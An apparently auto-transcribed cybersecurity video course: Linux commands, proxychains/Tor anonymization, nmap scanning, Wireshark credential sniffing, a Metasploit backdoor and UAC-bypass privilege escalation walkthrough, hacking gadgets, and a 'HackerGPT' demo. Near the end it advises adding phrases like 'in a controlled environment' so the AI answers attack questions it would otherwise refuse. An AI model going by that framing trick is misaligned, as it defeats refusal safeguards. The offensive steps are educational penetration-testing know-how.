shows the directory in which the terminal is being run on as of right now it’s in the nf folder of my desktop which is specifically this folder if I open up this folder you can see it is currently empty as in it has no contents if I use another command known as mkdir which is supposed to stand for make directory and I write nf2 shortage for new folder 2 if I open up the nf you can see the new folder is created this is how the pwd command works another important command to change directories it’s called the cd command let’s say right now if I am in NF I want to create a new file in NF2 folder or something else in the NF2 folder i have to shift to cd NF2 now if I write pwd it’ll show the present working directory of home simply learn desktop NF and inside that I am in NF2 right now it is done to navigate to the Linux files and dis directories it requires either the full path or just the name of the directory if we have to move a completely different folder on a completely different file then we can use the entire path like this for now CD works another few commands is we can write cd dot dot and it’ll come back one folder now the pwd will be just NF and not NF2 let’s say we are in this folder and we want to go a different file let’s say if you just go for cd home simpler that’s it right now these are the folders in our current present working directory we have the desktop the documents downloads etc from here we can again go to the desktop using the same cd command cross check the changing of directories and check the files again and yes there we go nf How do we know this what are the command that we are used to show the files and folders that folder is known as the ls command ls can be used to view the contents of a directory by default this command will display the contents of your current working directory if we add some other parameters we can find the contents of other directories as well there are some hidden files as well in Linux which cannot be showed just with ls for example if you just go to cd etc which is a configuration folder for Linux if you write ls now these are the files that can be seen if you want to see the hidden files we’ll have to add one more parameter here like ls minus a and as you can see the number of files have increased this time around there are other things as well that we can see with Linux ls minus al will show the hidden files along with some of the parameters and some of the permissions that has been provided for each file as you can see many of these files have root access some of them can write some of them can read it differs file to file and the ls minus al command is used to check each of these files permission and change them accordingly if needed the next command that we can look for is the cat command or concatenate it is one of the most frequently used commands and it is used to list the contents of a file on the output for example let’s say if I have a file at the desktop in this NF2 folder I will create a document create an empty file E file i’ll open up the document and I’ll write it as hello Kali i will save this up now to change the directories from etc to NF2 we have already discussed how to use the cd command using just the folder name now if you want to go through the entire directory we can write cd home as you can see it is already prompting us to complete the name of the directory at this point we just have to press tab and it completes it for ourself next we already know we have to enter the desktop nf and nf2 and this brings us to the current working directory here if we press ls we can find a file over here now as discussed for the concatenate it is used to show the contents of a file so right now if we press cat a t which stands for concatenate e file as you can see we have written hello kali in the text file and we can see the output right now we can also use it to create new files for example if we write cat any file name such as e file 2 here we can write anything hello kali again once we press ctrl c here we can check e file 2 and we have hello kali again printed over here we can see the same using the concatenate command as well if I press ls you can see we have two files here and I can go with cat e file 2 and I have hello kali again this is how the concatenate command works apart from this it can be used to copy there is a different command like called cp which is used to copy the files from one place to another mind you this is not moving this is only going to copy the command for example currently our PWD which is the present working directory is in the NF2 folder as you can see over here let’s copy the E file to the NF folder we can write CP E file 2 and give the path of the NF folder which will be home simply learn texttop NNF now if I press ls I’ll find both the files in NF2 since I copied to go back to the NF folder again we can again use the same command of no uh we can again use the home simply learn desktop and just NF no NF2 this time just NF as you can see this will change back our present working directory now when we press ls we will find the e file to file and the nf2 folder and we can confirm this using the gui as well this is the nf folder and you can see the nf2 folder and the e file 2 document if I write cat e file 2 cat e file 2 we can see the contents of the file now this can be done using moving as well for example if I go to cd NF2 which is the inside folder it has both the document files like E file and E file 2 let’s say I want to move the E file completely from NF2 to NF1 instead of writing cp the command I’m going to use is mv mv e file and again give the path of the folder into which I have to copy which will be again home simply learn desktop and nf as you can see the contents of the NF2 have appeared here and E file has been moved from NF2 to NF this is the NF2 and we don’t find E file here anymore if we press CD dot dot and we go back to NF LS right now and we can find both the files E file that we moved and E file 2 that we copied from the NF2 folder so this is how copying and moving will work using the terminal now this is just a simple oneline statement that might take a couple of clicks when using GUI this is why the command line interface is considered to be much more streamlined for Linux operating systems another very important command for Linux operating system is the pseudo command pseudo is short for super user do the command enables you to perform tasks that require administrative or root permissions we can think of it as how we run programs as administrator on Windows systems it is not advisable to use this command for daily use because it might be easy for an error to occur and the permissions of root are very intricate so new beginners are advised to use the pseudo command only when absolutely necessary for example pseudo su with this command I am giving this terminal a root permission this SU stands for this user at this point it’s going to ask for my admin password once I enter my password and I now have root access note how the password that I entered did not show up here this is a security measure to prevent people from snooping on your root password which is the endgame of all this operating system as you also can see the symbol changed if the dollar symbol is showing it’s source as a standard user when you switch to root you can easily see a hash symbol this opens up a separate shell inside this terminal command for example we can exit out of the root user to the standard user using the command exit and once again we have the dollar sign and the root has vanished over here there are some commands that will only work with administrative access for example when updating the Kali Linux system we have to use a update as you can see it says problem unlinking the file because permission denied now let’s try this using pseudo sudo apd update as you can see it is updating the package repositories which work as the software installed on the system this can be done using either writing the pseudo command every time we want to perform a root access or we can just write pseudo su once and write a update alone the fetching is complete over here for the second example let’s say I just write pseudo su and this time it’s not going to ask me the password because at this current terminal process I’ve already provided the root password once and it is in memory right now now when we used to update the system we had to write pseudo a update that was because we were running it as a standard user now we are running it as a root user so all we have to write is a update and it’s going to continue its work there you go another command that can be useful is the ping command it’s pretty self-explanatory it’s going to be checking the internet connectivity it can be used to check internet connectivity or you can see if the there is a local server on your system which needs to be pinged then you can check that for example if we have to write ping and we can use either IP address or domain let’s say if you want to check that if we can access google.com using this Kali Linux installation or not we can write ping google.com and you can see it shows the bytes being sent and received and how much time it took to take up the request this can be done for local systems as well for example this installation of Kali Linux is being run on a virtual machine once this machine is running I still have my host machine running over here the IP address of which is 192.168.29 179 if I try to ping this from here as you can see the time to complete the request is drastically low compared to a website on the internet considering this is on the local network this is how the ping command is worked and it can show you what kind of packages are transmitted how many are received if there was any kind of packet loss between the connection window and other details a very important command when working with the terminal for a long duration is a history command pretty self-explanatory there are so many commands that are being run sometimes people forget what was the change they did or what was the directory name they put a history command helps to recover some of the commands that you have written it doesn’t go all the way back but it takes up many commands that were inputed in the last few processes this is how the history command works these are some of the most commonly used terminal commands if you want to learn more about this terminal and every other feature of this please let us know in the comment section and we’ll try to make an in-depth tutorial especially if you got repeat if you want to learn more about the terminal please let us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on Linux moving on we learn how to configure proxy chains on our system proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine it is a good tool that hackers use to accomplish this goal is proxy chains essentially you can use proxy chains to run any program through a proxy server this will allow you to access internet from behind a restrictive firewall which hides your IP address proxy chains even allows you to use multiple proxies at once by chaining them together one of the most important reasons that proxy chains is used in a security context is that it’s easy to evade detection attackers often use proxies to hide their true identities while executing an attack and when multiple proxies are chained together it becomes harder and harder for a forensic professional to trace the traffic back to the original machine when these proxies are located across countries investigators would have to obtain warranties in the local jurisdictions where every proxy is located to to see how proxy chain works let’s open Firefox first and check our current IP address write Firefox and there we go as we can see Firefox is now open let’s check our current IP address right now if you go to an address called my ip.com and you can see it easily detects our country is in India and this is a public IP address now if we move to the terminal again here we can now write proxy chains minus h what this minus h does is it finds a help it uh it it stands for the help file this is for help file what we found out using this is proxy chains has a config file here etc proxy chains 4 cf this is the config file found using this config file we can customize how our proxy chain should work if we want to open that we have to use it in a text editor on Windows we have Notepad and other things like that Microsoft Word to edit documents on Linux we have a tool called nano to access the nano we use the command nano and give the path of the file that we want to check as of right now the proxy chains config file is located over here so we’re going to follow the path there chains 4 cf and here we go we see the config file there are three basic types of proxy chaining here we have a strict chain where all the proxy in the list will be used and they will be chained in order we have a random chain where each connection made through proxy chains will be done by a random combo of proxies in the proxy list and you have dynamic chain it’s the same as strict chain but dead proxies are excluded from the chain and here we can set up whichever type we want to enable or disable a particular type we use the hash symbol here as you can see right now all the lines have a hashtag symbol at the front except this one a dynamic chain this is the current one being used let’s say if I want to use a strict chain method so

    I can add a hash value here and remove the hash here at one point of time any one of these three four types should be enabled let’s go for the dynam um dynamic chain we can disable this strict chain by putting the hashtag in front and removing the dynamic chain as you can see below we have few commands to how to handle the nano text editor this symbol is known as the control button on your keyboard now if we want to write out which is synonymous to saving the file supposed to go with control O so if I press Ctrl O on my keyboard it says file name to write and we have to press enter here since we want to overwrite the proxy chains 4.f file we don’t want to create a new file over here so just press enter and we get a permission denied this permission denied we’re getting is because we have opened this using a standard user etc is a system folder to be able to use make some changes we have to use it using a pseudo command to exit this nano we have to use the controlx command we use controll x we’re going to clear and this time we’re going to use the pseudo command pseudo nano etc proxy chains 4 cf and we have the same file open up again now this time if you want to make a change let’s say we’re going to add a strict chain instead of a dynamic chain we remove the hashtag from strict we’re going to use control O for the save file option we’re going to press enter and it says wrote 160 lines again if you want to reverse this change we put the hashtag over here enable dynamic chain we press Ctrl O press enter and it says root 160 lines now we can exit straight away using the control X format right now we have not provided any file or a proxy chain we can have proxy IP addresses from the internet but we have to make sure that they are safe and they don’t snoop on our data when there is no proxy chains being provided personally it going it’s going to use the to network but for that we have to start to is a service in Linux to know more about the store we can write sudo systemct ctl which is used to know the status of services on the Linux operating system and status of to uh system ctl sorry uh as instead of stl It should be systemctl status to as you can see it is a to service anonymizing overlay network for TCP connections and it’s currently inactive now to start this up we have to write sudo systemct ctl start dot now if we repeat the same sudo systemctl status store as you can see it’s active now you can see the green logo over here okay to integrate the Firefox and the browser we can use the proxy chains command directly over here we can write proxy chains we can use Firefox to launch our web browser and let’s say if we want to visit google.com we press enter and the Firefox window is launched and it should open up google.com next and there we go if we go to my ip.com once again as you can see we have a different IP address and the country is unknown as well so this is how we can use proxy chains to anonymize uh internet usage when using Kali Linux next on our agenda is the ability to scan networks using N MAPAP at its core N MAPAP is a network scanning tool that uses IP packets to identify all the devices connected to a network can learn more about N map using the help file as you can see these are some of the parameters that can be used when scanning ports of a system you can see the version and the URL of the of the service over here the primary uses of N mapap can be broken into three core processes first the program gives you detailed information on every IP active on your network and then each IP can then be scanned secondly it can also be used to providing a lot of live hosts and open ports as well as identifying the OS of every connected device thirdly NAPAP has also become a valuable tool for users looking to protect personal and business websites using N MAPAP to scan your own web server particularly if you’re hosting your website from home is essentially simulating the process that a hacker would use to attack your site attacking your own site in this way is a powerful way of identifying security vulnerabilities as we already discussed the host Windows 10 machine on the system has an IP address of 192.168 29.179 if you want to test the OS scan of the system we’re going to first get the root permission over here we use the pseudo command and now we are a root user we’re going to launch the command N map minus O which is supposed to be an OS detection scan the IP address we can use of the host system 192.168.29.1 29.179 in a legitimate penetration testing scenario we can use the IP address of the vulnerable digit device over here we are going to let it scan for a while and it’s going to give us some guesses on what can the OS be as you can see the scan is done and it has shown some of the ports that are open you can see the MSRPC port open the HTTPS 443 port open which is used to connect to the internet and it has some aggressive OS guesses as well for example it thinks there’s a 90 94% chance that it’s going to be a Microsoft Windows XP Service Pack 3 that’s partly because a lot of the Windows XP update packages are still prevalent on Windows now that the OS detection is confirmed there are multiple more details that we can gather from N map let’s go with the N map minus a command which is supposed to capture as much data as possible there is also a speed setting you can call it a speed setting or a control setting of the minus T minus T ranges from T0 to T1 to T2 all the way up to T5 this basically determines how aggressively the victim is being scanned if you scan slowly it’ll take more time to provide the results but it will also give a less chance for the intrusion detection system on the vulnerable machine firewall to detect that someone is trying to penetrate the network for now if you want to go with somewhat of a high speed we can go with the T4 and provide the same IP address of the local machine I am trying to attack it’s going to take a little bit of time since it’s trying to capture a lot of information as you can see the results are now here it it launched a scan and took a few top ports that are most likely vulnerable from a Windows XP perspective and it showed a few ports over here it has not shown 991 filtered ports which could not be attacked anyway since they were closed for outside access it shows a few fingerprint settings like the connection policies and the port details it shows an HTTP options some other intricate details that can be used when you attacking its servers it shows a VMware version that it’s running and some few other ports over here apart from that we also have the aggressive OS guesses over here just like we did with the minus O and you can see this time it is showing Windows 7 as 98% no exact OS matches since uh if there was any exact OS matches we could have seen a 100% chances over here this is a trace route a trace route will be the time and the path a connection request takes from the source to the destination for example this request went from 19 to 16872.2 to a destination address since this is a local machine it took only a single step on multiple occasions if you’re trying to access a remote system it’s going to be a number of trace suits when it jumps from firewall to firewall and router to router this is how we can use end mapap to find information about a system and find some vulnerable ports we can access moving on we have a tutorial on how to use Wireshark to sniff network traffic to start using Wireshark we’re going to have to open the application first now during installation of Wireshark there is an option to enable if nonroot users can be able to capture traffic or not in my installation I have disabled that so I will be launching Wireshark when using the root user itself also to capture data we need an external Wi-Fi adapter you can see it over here in the VM tab removable devices link 802.1 and WLAN this is a external Wi-Fi adapter which is inserted into my USB system can see it over here if I write IW config this is the one wlan zero this is absolutely necessary because we need to have a monitor mode required we won’t need it for sniffing data on wireshark right now but it’s going to be necessary later on in this tutorial as well as we will see for now we can just start up wireshark by writing its name on the command line and it should start the program here we go here it’s going to check which of the adapters we want to use for example right now the ETH0 which supposed to stand for Ethernet zero port you can see data is being transmitted up and down we’re going to select ETH0 and we have started capturing data you can see the data request from the source the destination and the time and the which protocol it is following everything we can see and we can see the IPv4 flags here as well as you can see over here to capture internet traffic we can try running Firefox if we just write wikipedia.com And you can see the number of requests increasing okay this is spelling mistake wikipedia here you can see the application data of all these requests going up and they’re connected to a destination server of 103 102 166.224 now if you even if you check the transmission control protocol flags over here and so many more things we cannot find anything beneficial as you can see the information over here is gibberish which is supposed to be since it’s supposed to be encrypted now this is possible due to this being an HTTPS website hence you can see the lock symbol over here and connection is supposed to be secure now what about HTTP ports we have seen a many people recommend to not visit HTTP ports repeat we have seen many people recommend to not visit HTTP websites and even if you have to visit to not provide any critical information for example let’s go to a random HTTP page over here as you can see this is saying connection is not secure and this is an HTTP HTTP page and not HTTPS now let’s check for some of the information that is passing through this this is a login form let’s say I have a legitimate account over here if I write my account name and my password is supposed to be password 1 2 3 4 i press login and uh the password does not match because I do not have an account over here but let’s say I did and I was logged in as expected we can go to wireshark we can use filters over here now all the requests that I’m sending it’s a TCP request so I can write a filter containing TCP contains whatever string if it is being passed let’s say for the end username I write my account name so I can just write my account name over here and press enter to find a request over here now as you can see there are many flags over here if I go to the HTT HTML form URL encoded and open up some of its flags as you can see I can see my account name and simply learn password over here this is the same details that I input on the website let’s say I did have a legitimate account on this website i would have logged in with no problems but anyone who would be using Wireshark to sniff on the data can easily get my credentials from here this is why it’s recommended to not provide any information on HTTP pages the security is not up to the mark and always look for the lock symbol when visiting any website or making any internet transactions or providing any information this is how we can use Wireshark to detect transmission and sniff packet data that is being transferred through the network adapter next we have to learn about what is Metasploit the Metasloit project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development we can open up the terminal here we’re going to allow root access and to open up Metasloit the keyword is MSF console it’s going to take a little bit of time to start it up now the Metasloit console has been loaded from here we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable targets for example like we already discussed I’m running this virtual machine on a Windows 10 host machine so if I open the command prompt for my Windows 10 over here if I need to check the IP address once I go with IP config here you can see the IP address of this local machine moving on if we have to attack that machine let’s say we want to see what kind of exploits are going to work over there now we already know that Windows has some common vulnerabilities one of those vulnerabilities is the HDA server vulnerability hda is supposed to be a HTML application but when passed the right payload it can be used to open a back door into a system to start off with the metasloit and accessing such applications we’re going to use the command use exploit and the name of the reverse HDA server is this Windows MIS for miscellaneous HDA server as you can see it already found this one all right now there are some options that we need to set for this exploit to go through for example you can see some of the options over here there’s a payload the payload is supposed to be the malicious file that we are going to send on the HTML application which allows us to give the back door for example right now the payload which is the malicious file is a Windows meter reverse TCP completely understandable now let’s set the LHOST lhost and Rhost and SRV host should be the one where we are going to launch the attack from for example if we launched another tab of this console and we just press config the IP address is 192.168 72130 so we’re going to set the LHOST as 192.168.72.130 and we’re going to do the same thing with SRV host we’re going to set a port where we need to capture the backdoor access next the payload has already been set this payload will launch a backd dooror and give us interpreter access to the system metup printer is can be considered as an upgrade of a normal command prompt shell we will look into it once we get the access in the first place now that we have set the commands we can press on exploit and press enter now you can see we have a URL over here we’re going to copy this URL once the URL is copied we take it into the browser and paste it this will ask us to download this file now as per browser security settings this file should be blocked by default we can decide to keep it and with the correct formulation of this malicious package even the website browser antivirus softwares will not be able to detect good payloads we’re going to save this file and we’re going to open it publisher could not be verified if we press run and we go back to our meta beta access over here you can see it has already captured a URL of an HD server and it is writing delivering payload just have to wait for a few seconds till the payload is delivered it has sent this much amount of data meter session one is opened and we should get the access soon there we go now to understand where is the session set we can write sessions minus I as you can see it has a meta over here we’re going to write sessions minus I the session ID is one so we’re going to write one and we have the metap access now to get a fair idea of the system we’re going to write sus info and it’s going to the computer name the OS architecture all these things we can write the help command to see what are the things that we can get out of the system we can take screenshots we can control the webcam and start a video chat we can take a lot of things over here there are other commands as well where we can change the file directory like the cat command cd command there are so many things that work in the normal cmd which we can run on the meter as well now if you want to access the command prompt of the system directly we can go with this we have to write shell and there we go we are in the downloads folder right now to see if this is the same computer or not we’re going to write IP config as you can see it is our M victim machine with 192 168 or 29.171 we can just press exit and we’re back with the meter access this is how we can use Meta and Metasloit to gain access to a Windows 10 machine next let’s take a look at how we can get root access from a Windows 10 system we just learned how we can get a meter access from a system we can background this meter per session by writing background and pressing enter we can still we can still see the session session minus I it’s still present over here now these kind of access are not administrative access these are the kind of back doors that can be created for standard users but to get a complete access of a system including the program files the Windows documents we need to have root access or administrative access to do that we’re going to use another exploit reminder that the Metapita session of the standard access is already present and we’re not messing with it right now we’re going to set up another session albeit with the same machine that exploit name is use exploit Windows local bypass USC event viewer and there we go now if we check the options that we can put in the system we have to choose an exploit target we need to put a session as well let’s say we going to use the session one this is the session that has the meter access with the standard user it doesn’t have the system user we’re going to write set session one and we’re going to run exploit run a few commands and it opened a second meter session as you can see it is the session two if I write CIS info you can still see I’m not the um system user right now i’m still just a normal user how can we check that if you go to shell I’ll still see user shabb downloads all these things if I press exit go back to the meter there is a command on meter get system it attempts to elevate your privilege to that of the local system which basically means you get promoted into root access so if we write get system and due to pipe impersonation we now have the system root access as you can see now it has become x64 and we are the admin users now if I go to shell I can easily go back Windows and I can easily access these things this kind of control over the Windows folders and the program files folders these kind of things are not possible if you are not an admin access or the command prompt has not been run with admin permissions this is how we can use privilege escalation to get into an admin access system we used the second exploit which was the bypass US event viewer exploit and essentially used it with the first session as you can read here Windows escalation US protection bypass it was first disclosed on 2016 but it still works on some systems this is how we can get a root access on a Windows 10 installation hope you learned something new today today we are going to talk about some really interesting and powerful hacking gadgets you should know about in 2024 but remember this is just for learning we don’t want anyone getting into trouble so moving on the best way to keep your computers and devices safe is to know about the risk so some risk are easy to cater using strong passwords and don’t download from bad websites and don’t hand your unlocked device to strangers but they are also hidden dangers that can cause big problems some tools look innocent but can be very dangerous here are seven gadgets that look normal but are actually powerful hacking tools these tools are made for security experts to test system but they can be misused so let’s kick things off with a device that’s small but incredibly powerful that is Raspberry Pi so Raspberry Pi is a compact and affordable computer that has revolutionized the tech world originally designed for educational purposes it has become a favorite among hobist makers and even professionals despite its small size it boasts impressive capabilities including multiple USB ports HDMI output and support for various operating systems like Linux and Windows 10 IoT core the Raspberry Pi can be used for a wide range of projects from simple programming and gaming to complex IoT systems and home automation the Raspberry Pi can also be dangerous hacking tool with the right software it can be used to perform a variety of hacking task for example it can run Kali Linux a popular operating system for penetration testing this allows it to be used for network scanning password cracking and even setting up rogue access points to intercept data its small size makes it easy to hide and its affordability means it’s accessible to many in the wrong hands this innocent looking device can become a powerful tool for malicious activities now that we have seen the potential of the Raspberry Pi which by the way is one of the personal favorites for tinkering let’s move on to another seemingly simple but powerful device the Wi-Fi adapter so Wi-Fi adapter might seem like a simple device used to connect to wireless networks but it can be a potent hacking tool in the wrong hands these adapters when paired with the right software can intercept and monitor wireless communications making them invaluable for network analysis and penetration testing for example they can be used with tools like air crackg to crack Wi-Fi passwords hackers can use Wi-Fi adapters to perform attacks such as packet sniffing and man-in-the-middle attacks these activities can lead to unauthorized access to networks data theft and severe security breaches it’s like having a digital spy in your pocket while essential for legitimate security testing it’s crucial to be aware of the potential misuse and to secure your own wireless networks against such threats speaking of Wi-Fi you won’t believe how sneaky this next device is let’s take a look at a device that takes wireless hacking to a whole new level the Wi-Fi Pineapple the Wi-Fi Pineapple looks like a standard router but it is a sophisticated device used for hacking wireless networks it allows attackers to create rogue Wi-Fi access points tricking users into connecting and revealing their login credentials imagine connecting to what looks like a free public Wi-Fi only to have your data intercepted this device is capable of advanced man-in-the-middle attacks monitoring and recording data from all connected devices additionally the Wi-Fi Pineapple can capture Wi-Fi handshakes which can then be used to crack network passwords its powerful feature makes it a favorite among penetration testers for assessing network security but in the wrong hands it can be used for malicious activities highlighting the importance of robust wireless security so from Wi-Fi to Bluetooth which is everyone these days right let’s now explore a powerful tool for Bluetooth hacking the Ubertooth 1 the Ubertooth one is an open-source Bluetooth testing tool that appears to be a simple USB dongle despite its unassuming appearance it can monitor and analyze Bluetooth communications making it a valuable asset for those testing the security of Bluetooth devices think of it as a spy for Bluetooth traffic the Ubertooth 1 can capture Bluetooth packets perform Bluetooth attacks and even explore vulnerabilities in Bluetooth networks its ability to dissect Bluetooth traffic makes it a powerful tool for both legitimate security research and potential misuse understanding its capabilities helps highlight the importance of securing Bluetooth enabled devices against unauthorized access and attacks continuing with radio frequency tools which honestly sounds like something out of a spy movie so let’s discuss the hack RF1 and its versatile capabilities so the hack RF1 is a versatile softwaredefined radio SDR platform that can transmit and receive radio signals from 1 MHz to 6 GHz it looks like a standard electronic device but can be used for a wide range of hacking activities imagine being able to capture and manipulate signals across a broad spectrum with the Hack RF1 users can capture and analyze various radio signals jam frequencies and even spoof signals to manipulate communication systems this tool is particularly useful for exploring and testing the security of wireless communication systems while it serves an essential role in legitimate research and development the hack RF1 also demonstrates the need for robust security measures to protect against radio frequency based attacks so now let’s look at a tool that takes advantage of a computer’s trust in USB devices and trust me this one’s sneaky the USB rubber ducky so the USB rubber ducky is a device that looks like a regular flash drive but acts like a keyboard typing commands into any computer it’s plugged into hackers use it to execute pre-programmed scripts that can steal data install malware or take control of the target device it’s like a tiny digital ninja this tool exploits the trust computers have in USB devices making it a potent weapon for cyber attacks it’s a reminder to be cautious about plugging in unknown USB devices as they could be rubber duckies in disguise ready to unleash harmful commands and compromise your system security so finally we have got a real undercover gadget here let’s uncover the secret capabilities of the land turtle the land turtle looks like a typical USB ethernet adapter but it’s a covered hacking tool used to monitor and infiltrate networks don’t let its innocent appearance fool you it provides hackers with several capabilities such as network scanning DNS spoofing and data capture the land turtle can be discreetly plugged into a network allowing access to gather sensitive information and gain unauthorized access its ability to operate undetected makes it particularly dangerous emphasizing the need for vigilance and robust network security measures to prevent unauthorized devices from connecting to your systems so there you have it guys we have explored some of the most powerful and dangerous hacking gadgets out there these tools can do a lot of damage if they fall into the wrong hands that’s why it’s so important to stay informed and vigilant about cyber security hey everyone today we will explore the world of cyber security with hacker GPD specialized version of chat GPD designed for ethical hacking and cyber security in a digital landscape where cyber attacks occur every 39 seconds causing billions in damages annually hacker GPT provides the essential tools and knowledge to defend against these threats so hacker GBD offers guidance on a wide range of topics including security practices ethical hacking techniques and scripting for system security cyber crime damages are expected to reach $6 trillion annually making it a major challenge for organizations and if we talk about some of the breaches so in 2020 over 36 billion records were exposed due to data breaches and the infamous Equifax breach of 2017 where 147 million people’s information was compromised highlights the importance of regular security assessments and vulnerability management these are the areas where hacker GBD excels and hacker GBD strictly adheres to ethical guidelines refusing to assist with any unethical or illegal queries so our commitment is to provide guidance that adheres to legal and professional standards helping you become a responsible cyber security professional so guys let’s get started with hacker GVD that equip you with the knowledge and skills to defend against cyber threats ethically and effectively craving a career upgrade subscribe like and comment below dive into the link in the description to fasttrack your ambitions whether you’re making a switch or aiming higher SimplyLearn has your back and just a quick info for you guys if you are an aspiring cyber security professional looking for online training and certification from prestigious universities and in collaboration with leading experts to enhance your credibility then search no more simply learns postgraduate program in cyber security from MIT University in collaboration with EC council should be your right choice for more details you can use the link in the description box and pin comment so let’s get started so guys this is chat GPT and this is the paid version of chat GPT for what I was telling you is this is the explore GP section so here you can find all the GPS that are created by chat GPT OpenAI or the individuals or you can find the companies who have created GPS so you can find these are the recently used and this is the most used hacker GPT you can find other GPs also that is hacker GPT and you could see that and they have been used by 5,000 plus users and this have been used by 10,000 plus users so you can just search for ethical hacker GBT here and it has been rated 4.5 stars 10,000 plus conversations and these are the conversation status if you need any assistance and the capabilities you can see here and the ratings given by users and more by the creator who has created this so we’ll start with this we’ll start the chat here and I want to tell you guys that chat jeopardy doesn’t answer non-ethical questions so if you try to extract that information from chat GP that won’t be possible but we can do a bit like we can cross a bit line with ethical hacker GPT but that should be used for ethical purposes only so I will show you guys how you can utilize this GPT and one more thing guys if you want to create your own GPT you can also create that also you can go to explore GBD section and here’s the create option click on create and here you can start creating your GBD if you click on configure you can write the name of your GBD description instructions and the conversation starters as you just saw with the hacker GBD ethical hacker GBD and the capabilities what you want to be enabled you can do that and here in the create section you could write the prompts here and it will take that information and use it for more purposes and here you could attach more files that could help create your GPD okay guys so here you could see the configuration and the preview of your GPT and you can finalize that so moving back we’ll get back to ethical hacker GBT and start with our conversation with him so starting with the first thing we can do is we can ask him like how can I perform a basic security assessment on a web application so if I tell you guys performing a basic security assessment on a web application is crucial for identifying vulnerabilities and ensuring the application is secure and this process involves using various tools and techniques to test the application for common security issues so you could ask him that how can I perform a basic security assessment on a web application and just wait for a few seconds and you could have the response from ethical hacker GV so you could see that performing a basic security assessment on a web application involves several key steps and these are the key steps number one is preparation and information gathering and how you can do that these are the steps identify the scope gather information then is the second step that is reconnaissance and you can use the tools burp suit nikto and others similarly you could see all the steps here so I won’t be guiding or I won’t be reading what responses are generated by ethical hacker GBT i have used that and he provides very accurate like I would say around 95 to 96% accurate results here I want to show you guys how you can utilize it so I will show you prompts and what things you can ask him so this was all about repeat so this was about the general security thing now we’ll move to ethical hacking and we can ask him how we can perform a SQL injection attack ethically on a test environment so these are the prompts that you can write that would be how do I perform a SQL injection attack and that to ethically if you write this that would be good on a test environment and if I tell you guys so SQL injection is one of the most common web application vulnerabilities and understanding how to perform a SQL injection attack ethically on a test environment can help you identify and mitigate this risk in your own applications and you could see he has responded and he has provided you the steps that you can set up a control test environment first thing then preparation and you could use these tools then you have the manual SQL injection testing so these are the methods that you could use that is or or 1 equal to 1 for the database and automated SQL injection testing So this is the command for that and you could verify vulnerability documentation reporting so you could see that this GP is capable of answering the basic questions as we have discussed the basics question till now now we’ll move to scripting and automation so here you could see how he respond to this so we’ll ask him can you provide a Python script to scan open ports on a network so let’s see what he provides provide a Python script and that to to scan ports on a network so scanning open ports on network is a fundamental step in identifying potential vulnerabilities and a Python script that can automate this process making it easier to regularly check for open ports and secure them so this is the Python script you can use any ID and run on that and you could see that he’s explaining the code also yeah you can ask him like can you explain the code line by line and this hacker GBT will do that for you and how to run the script that also he has provided you and similarly we can also ask him that how we can write a bash script to monitor and log unauthorized login attempts and if you want I can also run this prompt how do I write a bash script and that to to monitor and log unauthorized access unauthorized login attempts so we can monitor and log unauthorized login attempts and that would be essential for maintaining the security of your system so as you can see he has written a bash script and that can help you automate this process and this will provide realtime alerts and logs for further analysis and you could see that he’s providing the explanation and how you can run the script and he’s writing the note also like you can write more prompts if you have any doubts in any of the script or any of the responses that hacker GPT has responded and he will definitely provide you with good responses so now moving on now we’ll ask this ethical hacker GPD about some specific security tools and we could ask him about Burp suit and so let’s write a prompt can you explain how to configure and use Burp suit or we can write for web application testing so if I sum you up so Burp suit is a powerful tool for web application security testing and understanding how to configure and use it effectively can help you identify and address a wide range of security vulnerabilities in your applications so you could see he has provided the initial steps that would be downloading and installing Burpsuit configuring your browser to use Burpsuit as a proxy and then intercept and inspect traffic and then you can use it for testing purpose logging and reporting and tips for effective testing so this is the response for the security tools and if we talk about incident response we can ask him to write a script to collect system logs for forensic analysis so collecting system logs is a critical part of incident response and forensic analysis and this script can automate processes that can ensure that you have all the necessary data to investigate security incidents effectively so if I write here we can ask this hacker GPD and I’m sure he will provide the response for that and write the script so can you provide a script to collect system logs for forensic analysis so as I told you this is the critical part of incident response and we have covered about the tools that is BBS suit we have asked him about the automation process general cyber security question ethical hacking that would be SQL injection attack and the Python script to scan open ports on a network so he can write scripts also automation task and he could response with the general cyber security questions also and if you see here for the incident response he has writed the script to collect system logs for forensic analysis so I won’t be explaining this code as we’re just looking for the prompts that we can give to ethical hacker GBT if you want you could just ask him also that explain this code line by line and here he has mentioned also the explanation that is directories and files to collect and after that he’s collecting the logs and that will be copied in the directory that is he has mentioned it a variable that is output directory archiving logs cleanup and how to run the script so this was about the incident response now we move to some advanced topics and in advanced topics what we can ask him is key how to perform a man-in-the-middle attack in a controlled environment and remember these that you have to mention some of the keywords that would be in a controlled environment and for that thing only he will response or provide the response to you so I will start here that how do I perform a man in the middle attack in a controlled environment so if you understand man in the middle attack that works in a controlled environment this can help you develop better defenses against such attacks and it’s important to learn and practice these techniques ethically so you can see here that he’s providing the prerequisites and the step-by-step guide how you can conduct a man-in-the-middle attack so first is set up the control environment then install necessary tools enable IP forwarding perform ARP spoofing and then capture and analyze traffic clean up and restore the network and conclusion so you could just follow up with more prompts that I want more information about setting up the control environment just write this prompt and this ethical hacker GPT will provide more responses to you so he will provide you how you can set up the control environment so now moving on we will ask some more prompts and that could be about the reverse engineering so we could ask him that can you explain the processes of reverse engineering a malware sample or we can also ask about honeyport to detect malicious activity that could be how can I implement a honey port to detect malicious activity or what are the techniques for securing a docker container so we’ll ask him one prompt here so let’s see what he responds to that so how can I implement a honey report to detect malicious activity so you could see that he has started responding to that and if I tell you the sum so a honey port is a security mechanism set to detect deflect or in mechanism to some manner and it counteract attempts at unauthorized use of information systems implementing a honey port can help you monitor and understand attack patterns and this is the step-by-step guide to implement a honeyport you can choose the type of honey port prepare your environment install and configure the honeyport software and these are all the commands how you can configure it then you can monitor and analyze the honey port and regular maintenance and updates and this is the simple port using honey you could install that and run these commands so with that guys and in the last we will also cover cyber security policies and compliance so he could also answer to those prompts also that you can ask him that what should be included in a company’s cyber security policy and you could mention which type of company you are running so I will ask him that so you could ask him that what should be included in a uh attempt cyber security policy so let’s see so you could see here that creating comprehensive security policy for an act company involves adding various aspects and that would be introduction first is the purpose for cyber security policy scope roles and responsibilities data protection and privacy network security application security user security awareness and training incident response and management compliance and legal requirements physical security device and endpoint security so similarly you could ask him that draft me the company’s cyber security policy and start with the introduction so he will provide you all the introduction points and then you can ask him that draft roles and responsibilities he will draft that also so you could like break 